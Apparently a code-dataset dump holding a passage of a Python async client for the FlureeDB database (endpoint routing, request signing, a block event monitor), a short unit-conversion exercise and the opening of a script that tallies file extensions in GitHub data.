Parameters
----------
client : FlureeClient
FlureeClient object to use as reference.
database : string
Full database name
"""
self.client = client
self.database = database
def __str__(self):
"""Cast to string
Returns
-------
str
Database name
"""
return self.database
def __call__(self, privkey=None, auth_address=None, sig_validity=120, sig_fuel=1000):
"""Invoke functor
Parameters
----------
privkey : string
Private key for the specific DB.
auth_address : string
Auth ID belonging with the privkey
sig_validity : int
Validity in seconda of signatures.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
Returns
-------
_FlureeDbClient
FlureeClient derived client for a specific DB
"""
return _FlureeDbClient(privkey,
auth_address,
self.database,
self.client.host,
self.client.port,
self.client.https,
self.client.ssl_verify,
sig_validity,
sig_fuel)
class FlureeClient:
"""Basic asynchonous client for FlureeDB for non-database specific APIs"""
def __init__(self,
masterkey=None,
auth_address=None,
host="localhost",
port=8080,
https=False,
ssl_verify=True,
sig_validity=120,
sig_fuel=1000):
"""Constructor
Parameters
----------
masterkey : string
Hex or base58 encoded signing key
auth_address : string
key-id of the signing key
host : string
hostname of the FlureeDB server. Defaults to localhost.
port : int
port of the FlureeDB server. Defaults to 8080
https : bool
Boolean indicating flureeDB is running behind a HTTPS proxy
ssl_verify : bool
Boolean, if False, indicating to not verify ssl certs.
sig_validity : int
Validity in seconda of the signature.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
Raises
------
FlureeHalfCredentials
If masterkey is specified but auth_address isn't, or the other way around.
"""
self.host = host
self.port = port
self.https = https
self.ssl_verify = ssl_verify
self.ssl_verify_disabled = False
if https and not ssl_verify:
self.ssl_verify_disabled = True
self.signer = None
if masterkey and auth_address:
self.signer = DbSigner(masterkey, auth_address, None, sig_validity, sig_fuel)
if masterkey and not auth_address or auth_address and not masterkey:
raise FlureeHalfCredentials("masterkey and auth_address should either both be specified, or neither")
self.session = None
self.session = aiohttp.ClientSession()
self.known_endpoints = set(["dbs",
"new_db",
"delete_db",
"add_server",
"remove_server",
"health",
"new_keys"])
self.unsigned_endpoints = set(["dbs", "health", "new_keys"])
self.use_get = set(["health", "new_keys"])
self.required = {}
self.required["new_db"] = set(["db_id"])
self.required["delete_db"] = set(["db_id"])
self.required["add_server"] = set(["server"])
self.required["delete_server"] = set(["server"])
self.optional = {"new_db": set(["snapshot"])}
self.implemented = set(["dbs",
"new_keys",
"health",
"new_db",
"delete_db",
"new_keys",
"add_server",
"remove_server"])
async def __aenter__(self):
"""Method for allowing 'with' constructs
Returns
-------
FlureeClient
this fluree client
"""
return self
async def __aexit__(self, exc_type, exc, traceback):
await self.close_session()
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return list(self.known_endpoints) + ["close_session",
"__init__",
"__dir__",
"__getattr__",
"__getitem__",
"__aiter__",
" __aenter__",
" __aexit__"]
def __getattr__(self, api_endpoint):
"""Select API endpoint
Parameters
----------
api_endpoint : string
Name of the API endpoint.
Returns
-------
object
Endpoint object suitable for API endpoint.
Raises
------
AttributeError
When a non-defined fluree endpoint is designated
NotImplementedError
When a fluree API endpoint is designated that hasn't been implemented yet.
"""
if api_endpoint not in self.known_endpoints:
raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
if api_endpoint not in self.implemented:
raise NotImplementedError("No implementation yet for " + api_endpoint)
secure = ""
if self.https:
secure = "s"
url = "http" + \
secure + \
"://" + \
self.host + \
":" + \
str(self.port) + \
"/fdb/" + \
"-".join(api_endpoint.split("_"))
signed = True
if api_endpoint in self.unsigned_endpoints:
signed = False
use_get = False
if api_endpoint in self.use_get:
use_get = True
required = set()
if api_endpoint in self.required:
required = self.required[api_endpoint]
optional = set()
if api_endpoint in self.optional:
optional = self.optional[api_endpoint]
if signed:
return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled)
if use_get:
if api_endpoint == "health":
return _UnsignedGetter(self.session, url, self.ssl_verify_disabled, ready="ready")
return _UnsignedGetter(self.session, url, self.ssl_verify_disabled)
return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled, unsigned=True)
async def __getitem__(self, key):
"""Square bracket operator
Parameters
----------
key : string
Network name, should be defined on server.
Raises
------
KeyError
When a non-defined network is designated.
Returns
-------
_Network
Helper object for designating databases within a network.
"""
subkey = None
if "/" in key:
parts = key.split("/")
key = parts[0]
subkey = parts[1]
databases = await self.dbs()
options = set()
for pair in databases:
if pair[0] == key:
options.add(pair[1])
if not bool(options):
raise KeyError("No such network: '" + key + "'")
network = _Network(self, key, options)
if subkey is None:
return network
return network[subkey]
async def __aiter__(self):
"""Iterate over all networks
Yields
------
string
Name of the network
_Network
Itteratable object with databases per network.
"""
databases = await self.dbs()
optionsmap = {}
for pair in databases:
network = pair[0]
database = pair[1]
if network not in optionsmap:
optionsmap[network] = set()
optionsmap[network].add(database)
for key, item in optionsmap.items():
yield _Network(self, key, item)
async def close_session(self):
"""Close HTTP(S) session to FlureeDB"""
if self.session:
await self.session.close()
return
class _FlureeDbClient:
"""Basic asynchonous client for FlureeDB representing a particular database on FlureeDB"""
def __init__(self,
privkey,
auth_address,
database,
host="localhost",
port=8080,
https=False,
ssl_verify=True,
sig_validity=120,
sig_fuel=1000):
"""Constructor
Parameters
----------
privkey : string
Hex or base58 encoded signing key
auth_address : string
key-id of the signing key
database : string
net/db string of the flureeDB database
host : string
hostname of the FlureeDB server. Defaults to localhost.
port : int
port of the FlureeDB server. Defaults to 8080
https : bool
Boolean indicating flureeDB is running behind a HTTPS proxy
ssl_verify : bool
Boolean, when false, indicating no validation of ssl certs.
sig_validity : int
Validity in seconda of the signature.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
"""
self.database = database
self.host = host
self.port = port
self.https = https
self.ssl_verify_disabled = False
self.monitor = {}
self.monitor["listeners"] = {}
self.monitor["running"] = False
self.monitor["next"] = None
self.monitor["rewind"] = 0
self.monitor["on_block_processed"] = None
self.monitor["predicate_map"] = {}
self.monitor["predicate_map_multi"] = {}
self.monitor["predicate_map_block"] = 0
self.monitor["lastblock_instant"] = None
self.monitor["instant_monitors"] = []
if https and not ssl_verify:
self.ssl_verify_disabled = True
self.signer = None
if privkey and auth_address:
self.signer = DbSigner(privkey, auth_address, database, sig_validity, sig_fuel)
self.session = None
self.session = aiohttp.ClientSession()
self.known_endpoints = set(["snapshot",
"list_snapshots",
"export",
"query",
"flureeql",
"multi_query",
"block",
"history",
"transact",
"graphql",
"sparql",
"command",
"reindex",
"hide",
"gen_flakes",
"query_with",
"test_transact_with",
"block_range_with",
"ledger_stats",
"storage",
"pw"])
self.pw_endpoints = set(["generate", "renew", "login"])
self.implemented = set(["query",
"flureeql",
"block",
"command",
"ledger_stats",
"list_snapshots",
"snapshot",
"multi_query"])
def monitor_init(self, on_block_processed, start_block=None, rewind=0, always_query_object=False, start_instant=None):
"""Set the basic variables for a fluree block event monitor run
Parameters
----------
on_block_processed: callable
Callback to invoke when a block has been fully processed.
start_block: int
Block number to start at, instead of the next block to arive on the blockchain
rewind: int
Number of seconds to rewind from now. Currently not implemented.
always_query_object: bool
Boolean choosing if we want to run efficiently and only query if block parsing gives ambiguous results,
or if we always want to use extra queries
start_instant: int
If (and only if) instant monitor callbacks are used, this parameter should be provided to avoid
large replays of inactive chain instant events that occured after the last block. Use the instant
as provided py the persistence callback in the previous run.
Raises
------
NotImplementedError
Currently raised when rewind is specified.
"""
assert callable(on_block_processed)
assert start_block is None or isinstance(start_block, int)
assert isinstance(rewind, int)
self.monitor["next"] = start_block
self.monitor["rewind"] = rewind
self.monitor["always_query_object"] = always_query_object
self.monitor["on_block_processed"] = on_block_processed
self.monitor["lastblock_instant"] = start_instant
def monitor_register_create(self, collection, callback):
"""Add a callback for create events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when create event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "C" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["C"] = set()
self.monitor["listeners"][collection]["C"].add(callback)
def monitor_register_delete(self, collection, callback):
"""Add a callback for delete events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when delete event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "D" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["D"] = set()
self.monitor["listeners"][collection]["D"].add(callback)
def monitor_register_update(self, collection, callback):
"""Add a callback for update events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when update event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "U" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["U"] = set()
self.monitor["listeners"][collection]["U"].add(callback)
def monitor_instant(self, predicate, callback, offset=0):
"""Ass a callback for the passing of time on an instant predicate
Parameters
----------
predicate: str
Name of the instant predicate to monitor
callback: callable
Callback to invoke when the time (plus offset) passes the monitored instant
offset: int
If specified, number of seconds from monitored instant value to trigger on
"""
self.monitor["instant_monitors"].append([predicate, offset*1000, callback])
def monitor_close(self):
"""Abort running any running monitor"""
self.monitor["running"] = False
async def _figure_out_next_block(self):
"""Figure out what block the user wants/needs to be the next block"""
if self.monitor["rewind"] != 0 and self.monitor["rewind"] is not None:
filt = "(> ?instant (- (now) (* 1000 " + str(self.monitor["rewind"]) + "))))"
rewind_block = await self.flureeql.query(
select=["?blockid"],
opts={"orderBy": ["ASC", "?instant"], "limit": 1},
where=[
["?block", "_block/instant", "?instant"],
["?block", "_block/number", "?blockid"],
{"filter": [filt]}
])
if rewind_block and (self.monitor["next"] is None or self.monitor["next"] < rewind_block[0][0]):
self.monitor["next"] = rewind_block[0][0]
if not rewind_block:
self.monitor["next"] = None
async def _build_predicates_map(self, block=None):
"""Build a predicates map for quick lookup
Returns
-------
dict
dictionary mapping predicate id's to predicate names
"""
if block is not None:
if self.monitor["predicate_map_block"] != block:
predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate", block=block)
self.monitor["predicate_map_block"] = block
else:
predicates = None
else:
predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate")
if predicates is not None:
predicate = {}
is_multi = {}
for pred in predicates:
predicate[pred["_id"]] = pred["name"]
if "multi" in pred:
is_multi[pred["name"]] = pred["multi"]
else:
is_multi[pred["name"]] = False
self.monitor["predicate_map"] = predicate
self.monitor["predicate_map_multi"] = is_multi
async def _find_start_block(self):
"""Find the start block
Returns
-------
int
Number of the starting block
Raises
------
RuntimeError
Raised when the very first ledger_stats issued to FlureeDB returns an error.
"""
if self.monitor["next"] is None:
stats = await self.ledger_stats()
if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
startblock = stats["data"]["block"]
else:
raise RuntimeError("Invalid initial response from ledger_stats")
else:
startblock = self.monitor["next"]
return startblock
async def _get_endblock(self, errorcount=0):
"""Get what for now should be the ending block
Parameters
----------
errorcount: int
Counter for counting succesive API failure
Returns
-------
int
The ending block number
int
An updated version of the errorcount argument
"""
stats = await self.ledger_stats()
if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
endblock = stats["data"]["block"]
return endblock, 0
return 0, errorcount + 1
def _get_flakeset_collection(self, flakelist):
"""Helper function for getting the collection name from a flakes array
Parameters
----------
flakelist : list
list of flake lists
Returns
-------
str
Name of the collection.
"""
return flakelist[0][1].split("/")[0]
async def _group_block_flakes(self, block_data, blockno):
"""Return a grouped-by object-id and predicate name patched version of a block
Parameters
----------
block_data : list
Raw block data as returned by FlureeDB
predicate : dict
Dictionary for looking up predicate names by number
blockno : int
Number of the block currently being processed.
Returns
-------
dict
A dictionary of object id's to flake arrays.
Raises
------
FlureeUnexpectedPredicateNumber
Raised when an unknown predicate id is detected.
"""
has_predicate_updates = False
grouped = {}
for flake in block_data[0]["flakes"]:
predno = flake[1]
# Patch numeric predicates to textual ones.
if predno in self.monitor["predicate_map"]:
flake[1] = self.monitor["predicate_map"][predno]
else:
raise FlureeUnexpectedPredicateNumber("Need a restart after new predicates are added to the database")
# Group the flakes together by object.
if not flake[0] in grouped:
grouped[flake[0]] = []
grouped[flake[0]].append(flake)
# pylint: disable=consider-using-dict-items
for obj in grouped:
if grouped[obj][0][1].split("/")[0] == "_predicate":
has_predicate_updates = True
# pylint: enable=consider-using-dict-items
if has_predicate_updates:
await self._build_predicates_map(blockno)
return grouped
def _get_transactions_and_temp_ids(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
list
list of operations from this transaction
dict
map of temporary ids.
"""
operations = None
tempids = None
for flake in flakeset:
if flake[1] == '_tx/tempids':
try:
tid_obj = json.loads(flake[2])
if isinstance(tid_obj, dict):
tempids = tid_obj
except json.decoder.JSONDecodeError:
pass
elif flake[1] == "_tx/tx":
try:
tx_obj = json.loads(flake[2])
if isinstance(tx_obj, dict) and "tx" in tx_obj and isinstance(tx_obj["tx"], list):
operations = tx_obj["tx"]
except json.decoder.JSONDecodeError:
pass
return operations, tempids
def _get_block_instant(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
int
Time instance value for this block
"""
instance = None
for flake in flakeset:
if flake[1] == '_block/instant':
instance = flake[2]
return instance
async def _get_block_instant_by_blockno(self, block):
"""Get the instant timestamp for a given block number
Parameters
----------
block: int
Block number
Returns
-------
int
Time instance value for this block
"""
result = await self.flureeql.query(
select=["?instant"],
where=[
["?block", "_block/instant", "?instant"],
["?block", "_block/number", block]
]
)
if result:
return result[0][0]
return None
def _get_object_id_to_operation_map(self, tempids, operations):
"""Process temp ids and operations, return an object id to operation map.
Parameters
----------
tempids : dict
Temp-id map
operations : list
The url that would have been used
Returns
-------
dict
object id to operation map.
"""
# pylint: disable=too-many-nested-blocks, too-many-branches
obj_tx = {}
if tempids:
for tmp_id in tempids:
real_id = tempids[tmp_id]
counters = {}
if isinstance(real_id, int):
for operation in operations:
if isinstance(operation, dict) and "_id" in operation:
if isinstance(operation["_id"], str):
if operation["_id"] == tmp_id:
obj_tx[real_id] = operation
if operation["_id"] not in counters:
counters[operation["_id"]] = 0
counters[operation["_id"]] += 1
altname = operation["_id"] + "$" + str(counters[operation["_id"]])
if altname == tmp_id:
obj_tx[real_id] = operation
elif isinstance(operation["_id"], list):
if len(operation["_id"]) == 2:
txid = '["' + operation["_id"][0] + '" "' + operation["_id"][1] + '"]'
if txid == tmp_id:
obj_tx[real_id] = operation
if len(operations) == 1:
obj_tx[""] = operations[0]
for operation in operations:
if isinstance(operation, dict) and "_id" in operation:
if isinstance(operation["_id"], int):
obj_tx[operation["_id"]] = operation
return obj_tx
async def _do_instant_monitor(self, oldinstant, newinstant, blockno):
for monitor in self.monitor["instant_monitors"]:
predicate = monitor[0]
offset = monitor[1]
callback = monitor[2]
windowstart = oldinstant - offset
windowstop = newinstant - offset
filt = "(and (> ?instant " + str(windowstart) + ") (<= ?instant " + str(windowstop) + "))"
eventlist = await self.flureeql.query(
select=[{"?whatever": ["*"]}],
opts={"orderBy": ["ASC", "?instant"]},
where=[
["?whatever", predicate, "?instant"],
{"filter": [filt]}
],
block=blockno
)
for event in eventlist:
await callback(event)
async def _process_instant(self, instant, block, fromblock):
minute = 60000
timeout = 1*minute
if (fromblock or
self.monitor["lastblock_instant"] and
self.monitor["lastblock_instant"] + timeout < instant):
if self.monitor["lastblock_instant"]:
await self._do_instant_monitor(self.monitor["lastblock_instant"], instant, block)
self.monitor["lastblock_instant"] = instant
async def _get_and_preprocess_block(self, blockno):
"""Fetch a block by block number and preprocess it
Parameters
----------
blockno : int
Number of the block that needs to be fetched
predicate : dict
Predicate id to name map
Returns
-------
list
A grouped and predicate patched version of the fetched block.
dict
Object id to operation dict
"""
# Fetch the new block
block_data = await self.block.query(block=blockno)
# Groub by object
try:
grouped = await self._group_block_flakes(block_data, blockno)
except FlureeUnexpectedPredicateNumber:
await self._build_predicates_map(blockno)
grouped = await self._group_block_flakes(block_data, blockno)
# Distill new ones using _tx/tempids
obj_tx = {}
block_meta = {}
for obj in grouped:
transactions = None
tempids = None
instant = None
collection = self._get_flakeset_collection(grouped[obj])
if collection == "_tx":
transactions, tempids = self._get_transactions_and_temp_ids(grouped[obj])
if collection == "_block":
instant = self._get_block_instant(grouped[obj])
for flake in grouped[obj]:
if len(flake[1].split("/")) > 1:
block_meta[flake[1].split("/")[1]] = flake[2]
if transactions:
obj_tx = self._get_object_id_to_operation_map(tempids, transactions)
if instant:
await self._process_instant(instant, blockno, True)
return grouped, obj_tx, instant, block_meta
async def _process_flakeset(self, collection, obj, obj_tx, blockno, block_meta):
"""Process temp ids and operations, return an object id to operation map.
Parameters
----------
collection : str
name of the collection the object for this flakeset refers to
obj : list
The flakelist
obj_tx : dict
Dictionary mapping from object id to operation object.
blockno : int
Block number of the block currently being processed.
"""
# pylint: disable=too-many-branches,too-many-statements
operation = None
action = None
previous = None
latest = None
if obj[0][0] in obj_tx:
operation = obj_tx[obj[0][0]]
elif "" in obj_tx:
operation = obj_tx[""]
has_true = False
has_false = False
has_multi = False
for flake in obj:
if flake[4]:
has_true = True
else:
has_false = True
if flake[1] in self.monitor["predicate_map_multi"]:
if self.monitor["predicate_map_multi"][flake[1]]:
has_multi = True
if self.monitor["always_query_object"]:
previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
if previous:
previous = previous[0]
action = "update"
else:
previous = None
latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
if latest:
latest = latest[0]
else:
latest = None
if previous is None:
action = "insert"
elif latest is None:
action = "delete"
else:
action = "update"
if operation and "_action" in operation and operation["_action"] != "upsert" and not has_multi:
action = operation["_action"]
if action is None and has_true and has_false:
action = "update"
if action is None and operation and "_id" in operation and isinstance(operation["_id"], str):
action = "insert"
if action is None and operation and has_false and not has_true:
if len(obj) == 1 and has_multi:
action = "update"
else:
action = "delete"
if action is None and has_true and not has_false:
if blockno > 1:
previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
if previous:
previous = previous[0]
action = "update"
else:
previous = None
action = "insert"
else:
previous = None
action = "insert"
if action is None:
latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
if latest:
latest = latest[0]
action = "update"
else:
latest = None
action = "delete"
if action == "insert" and "C" in self.monitor["listeners"][collection]:
for callback in self.monitor["listeners"][collection]["C"]:
await callback(obj_id=obj[0][0], flakes=obj, new_obj=latest, operation=operation, block_meta=block_meta)
elif action == "update" and "U" in self.monitor["listeners"][collection]:
for callback in self.monitor["listeners"][collection]["U"]:
await callback(obj_id=obj[0][0],
flakes=obj,
old_obj=previous,
new_obj=latest,
operation=operation,
block_meta=block_meta)
elif action == "delete" and "D" in self.monitor["listeners"][collection]:
for callback in self.monitor["listeners"][collection]["D"]:
await callback(obj_id=obj[0][0], flakes=obj, old_obj=previous, operation=operation, block_meta=block_meta)
async def monitor_untill_stopped(self):
"""Run the block event monitor untill stopped
Raises
------
NotImplementedError
Currently raised when rewing is specified.
RuntimeError
Raised either when there are no listeners set, or if there are too many errors.
"""
# pylint: disable=too-many-nested-blocks, too-many-branches, too-many-return-statements
if (not bool(self.monitor["listeners"])) and (not bool(self.monitor["instant_monitors"])):
raise RuntimeError("Can't start monitor with zero registered listeners")
# Set running to true. We shall abort when it is set to false.
self.monitor["running"] = True
await self._figure_out_next_block()
if not self.monitor["running"]:
return
startblock = await self._find_start_block() + 1
if not self.monitor["running"]:
return
# First make a dict from the _predicate collection.
if startblock > 1:
await self._build_predicates_map(startblock - 1)
if not self.monitor["running"]:
return
noblocks = True
if startblock > 1 and self.monitor["instant_monitors"] and self.monitor["lastblock_instant"] is None:
self.monitor["lastblock_instant"] = await self._get_block_instant_by_blockno(startblock-1)
if not self.monitor["running"]:
return
stats_error_count = 0
last_instant = 0
while self.monitor["running"]:
# If we had zero blocks to process the last time around, wait a full second before
# polling again if there are new blocks.
if noblocks:
await asyncio.sleep(1)
if not self.monitor["running"]:
return
await self._process_instant(int(time.time()*1000), startblock - 1, False)
now = int(time.time()*1000)
if now - last_instant >= 59500: # Roughly one minute
last_instant = now
await self.monitor["on_block_processed"](startblock - 1, now)
if not self.monitor["running"]:
return
noblocks = True
endblock, stats_error_count = await self._get_endblock()
if not self.monitor["running"]:
return
if endblock:
if endblock >= startblock:
noblocks = False
for block in range(startblock, endblock + 1):
grouped, obj_tx, instant, block_meta = await self._get_and_preprocess_block(block)
# Process per object.
for obj in grouped:
if obj > 0:
collection = self._get_flakeset_collection(grouped[obj])
if collection in self.monitor["listeners"]:
await self._process_flakeset(collection, grouped[obj], obj_tx, block, block_meta)
if not self.monitor["running"]:
return
# Call the persistence layer.
await self.monitor["on_block_processed"](block, instant)
last_instant = instant
# Set the new start block.
startblock = endblock + 1
else:
stats_error_count += 1
if stats_error_count > 100:
raise RuntimeError("Too many errors from ledger_stats call")
async def ready(self):
"""Awaitable that polls the database untill the schema contains collections"""
while True:
try:
await self.flureeql.query(
select=["_collection/name"],
ffrom="_collection"
)
return
except FlureeHttpError:
await asyncio.sleep(0.1)
async def __aexit__(self, exc_type, exc, traceback):
await self.close_session()
async def __aenter__(self):
"""Method for allowing 'with' constructs
Returns
-------
_FlureeDbClient
this fluree DB client
"""
return self
async def close_session(self):
"""Close HTTP(S) session to FlureeDB"""
if self.session:
await self.session.close()
return
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return list(self.known_endpoints) + ["close_session",
"__init__",
"__dir__",
"__getattr__",
" __aenter__",
" __aexit__"]
def __getattr__(self, api_endpoint):
# pylint: disable=too-many-statements
"""Select API endpoint
Parameters
----------
api_endpoint : string
Name of the API endpoint.
Returns
-------
object
Endpoint object suitable for API endpoint.
Raises
------
NotImplementedError
Defined endpoint without library implementation (for now)
AttributeError
Undefined API endpoint invoked
FlureeKeyRequired
When 'command' endpoint is invoked in open-API mode.
"""
class _StringEndpoint:
def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
api_endpoint : string
Name of the API endpoint
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
If https, dont validate ssl certs.
"""
self.api_endpoint = api_endpoint
secure = ""
if client.https:
secure = "s"
self.url = "http" + \
secure + \
"://" + \
client.host + \
":" + \
str(client.port) + \
"/fdb/" + \
client.database + \
"/" + \
"-".join(api_endpoint.split("_"))
self.signer = client.signer
self.session = client.session
self.ssl_verify_disabled = ssl_verify_disabled
async def _post_body_with_headers(self, body, headers):
"""Internal, post body with HTTP headers
Parameters
----------
body : string
HTTP Body string
headers : dict
Key value pairs to use in HTTP POST request
Returns
-------
string
Content as returned by HTTP server
Raises
------
FlureeHttpError
When HTTP status from fluree server is anything other than 200
"""
if self.ssl_verify_disabled:
async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
return await resp.text()
else:
async with self.session.post(self.url, data=body, headers=headers) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
return await resp.text()
async def header_signed(self, query_body):
"""Do a HTTP query using headers for signing
Parameters
----------
query_body : any
query body to sign using headers.
Returns
-------
string
Return body from server
"""
if self.signer:
body, headers, _ = self.signer.sign_query(query_body, querytype=self.api_endpoint)
else:
body = json.dumps(query_body, indent=4, sort_keys=True)
headers = {"Content-Type": "application/json"}
return await self._post_body_with_headers(body, headers)
async def body_signed(self, transact_obj, deps=None):
"""Do a HTTP query using body envelope for signing
Parameters
----------
transact_obj : list
transaction to sign using body envelope.
deps: dict
FlureeDb debs
Returns
-------
string
Return body from server
"""
command = self.signer.sign_transaction(transact_obj, deps)
body = json.dumps(command, indent=4, sort_keys=True)
headers = {"content-type": "application/json"}
return await self._post_body_with_headers(body, headers)
async def empty_post_unsigned(self):
"""Do an HTTP POST without body and without signing
Returns
-------
string
Return body from server
"""
return await self._post_body_with_headers(None, None)
class FlureeQlEndpointMulti:
"""Endpoint for JSON based (FlureeQl) multi-queries"""
def __init__(self, client, ssl_verify_disabled, raw=None):
"""Constructor
Parameters
----------
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
raw: dict
The whole raw multiquery
"""
self.stringendpoint = _StringEndpoint("multi_query", client, ssl_verify_disabled)
if raw:
self.multi_query = raw
else:
self.multi_query = {}
def __call__(self, raw=None):
"""Invoke as function object.
Parameters
----------
raw: dict
The whole raw multiquery
Returns
-------
FlureeQlEndpointMulti
Pointer to self
"""
if raw is not None:
self.multi_query = raw
return self
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return ["__call__", "__dir__", "__init__"]
def __getattr__(self, method):
"""query
Parameters
----------
method : string
subquery name
Returns
-------
_FlureeQlSubQuery
Helper class for creating FlureeQl multi-queries.
"""
return _FlureeQlSubQuery(self, method)
async def query(self):
"""Do the actual multi-query
Returns
-------
dict
The result from the mult-query
"""
return_body = await self.stringendpoint.header_signed(self.multi_query)
return json.loads(return_body)
class FlureeQlEndpoint:
"""Endpoint for JSON based (FlureeQl) queries"""
def __init__(self, api_endpoint, client, ssl_verify_disabled):
"""Constructor
Parameters
----------
api_endpoint : string
Name of the API endpoint
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
"""
if api_endpoint == "flureeql":
api_endpoint = "query"
self.api_endpoint = api_endpoint
self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return ["query", "actual_query", "__dir__", "__init__"]
def __getattr__(self, method):
"""query
Parameters
----------
method : string
should be 'query'
Returns
-------
_FlureeQlQuery
Helper class for creating FlureeQl queries.
Raises
------
AttributeError
When anything other than 'query' is provided as method.
"""
if method != 'query':
raise AttributeError("FlureeQlEndpoint has no attribute named " + method)
return _FlureeQlQuery(self)
async def actual_query(self, query_object):
"""Execure a query with a python dict that should get JSON serialized and convert JSON
response back into a python object
Parameters
----------
query_object : dict
JSON serializable query
Returns
-------
dict
JSON decoded query response
"""
return_body = await self.stringendpoint.header_signed(query_object)
return json.loads(return_body)
class CommandEndpoint:
"""Endpoint for FlureeQL command"""
def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
api_endpoint : string
Name of the API endpoint
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
"""
self.client = client
self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
async def transaction(self, transaction_obj, deps=None, do_await=True):
"""Transact with list of python dicts that should get serialized to JSON,
returns a transaction handle for polling FlureeDB if needed.
Parameters
----------
transaction_obj : list
Transaction list
deps: dict
FlureeDb debs
do_await: bool
Do we wait for the transaction to complete, or do we fire and forget?
Returns
-------
string
transactio ID of pending transaction
Raises
------
FlureeTransactionFailure
When transaction fails
"""
tid = await self.stringendpoint.body_signed(transaction_obj, deps)
tid = tid[1:-1]
if not do_await:
return tid
while True:
status = await self.client.query.query(select=["*"], ffrom=["_tx/id", tid])
if status:
if "error" in status[0]:
raise FlureeTransactionFailure("Transaction failed:" + status[0]["error"])
if "_tx/error" in status[0]:
raise FlureeTransactionFailure("Transaction failed:" + status[0]["_tx/error"])
return status[0]
await asyncio.sleep(0.1)
class LedgerStatsEndpoint:
"""Endpoint for ledger_stats"""
def __init__(self, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
"""
self.stringendpoint = _StringEndpoint('ledger_stats', client, ssl_verify_disabled)
async def __call__(self):
"""Send request to ledger-stats endpoint and retrieve result
Returns
-------
dict
json decode result from the server.
"""
return_body = await self.stringendpoint.empty_post_unsigned()
return json.loads(return_body)
if api_endpoint not in self.known_endpoints:
raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
if api_endpoint not in self.implemented:
raise NotImplementedError("No implementation yet for " + api_endpoint)
if api_endpoint in ["command"]:
if self.signer is None:
raise FlureeKeyRequired("Command endpoint not supported in open-API mode. privkey required!")
return CommandEndpoint(api_endpoint, self, self.ssl_verify_disabled)
if api_endpoint in ["multi_query"]:
return FlureeQlEndpointMulti(self, self.ssl_verify_disabled)
if api_endpoint == 'ledger_stats':
return LedgerStatsEndpoint(self, self.ssl_verify_disabled)
return FlureeQlEndpoint(api_endpoint, self, self.ssl_verify_disabled)
| 2.3125 | 2 |
ex008.py | iagoMaik/exPython | 0 | 12765080 | m = float(input('Digite um tamanho (em metros): '))
dm = m * 10
cm = m * 100
mm = m * 1000
dam = m / 10
hm = m / 100
km = m / 1000
print('convertendo...')
print('[dm] =', dm)
print('[cm] =', cm)
print('[mm] =', mm)
print('[dam] =', dam)
print('[hm] =', hm)
print('[km] =', km)
| 3.84375 | 4 |
scripts/format_github_data.py | mhagiwara/nanigonet | 62 | 12765081 | import json
import os
import sys
from collections import Counter
from pathlib import Path
TRAIN_DIR = Path('data/train')
def count_popular_languages():
language_counts = Counter()
for line in sys.stdin:
data = json.loads(line)
for _, path_after in data['paths']:
extension = path_after.rsplit('.', 1)[-1]
language_counts[extension] += 1
for language, counts in language_counts.most_common():
print(language, counts)
def main():
extension_mapping = {
'c': 'c',
'h': 'c',
'cc': 'cpp',
'cpp': 'cpp',
'cs': 'cs',
'css': 'css',
'go': 'go',
'hs': 'hs',
